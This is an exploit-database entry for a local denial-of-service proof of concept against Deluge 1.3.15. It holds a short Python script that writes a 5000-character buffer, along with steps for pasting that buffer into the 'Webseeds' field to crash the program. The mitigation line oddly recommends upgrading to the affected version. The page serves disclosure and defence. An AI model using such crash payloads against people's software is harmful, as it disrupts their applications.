header-logo
Suggest Exploit
vendor:
Deluge
by:
Victor Mondragón
7.8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Deluge
Affected Version From: 1.3.15
Affected Version To: 1.3.15
Patch Exists: YES
Related CWE: N/A
CPE: deluge-torrent.org/windows/deluge-1.3.15-win32-py2.7.exe
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 Service Pack 1 x64
2019

Deluge 1.3.15 – ‘Webseeds’ Denial of Service (PoC)

Deluge 1.3.15 is vulnerable to a denial of service attack when a maliciously crafted 'Webseeds' field is supplied. This can be exploited by an attacker to crash the application, resulting in a denial of service condition.

Mitigation:

Upgrade to the latest version of Deluge 1.3.15 or later.
Source

Exploit-DB raw data:

#Exploit Title: Deluge 1.3.15 - 'Webseeds' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-20
#Vendor Homepage: https://dev.deluge-torrent.org/
#Software Link: http://download.deluge-torrent.org/windows/deluge-1.3.15-win32-py2.7.exe
#Tested Version: 1.3.15
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: deluge_web.py
#2.- Open deluge_web.txt and copy content to clipboard
#3.- Open deluge.exe
#4.- Select "File" > "Create Torrent" 
#5.- In "Webseeds" field paste Clipboard
#6.- Crashed

cod = "\x41" * 5000

f = open('deluge_web.txt', 'w')
f.write(cod)
f.close()

Navigation

Suggest Exploit

Services By CQR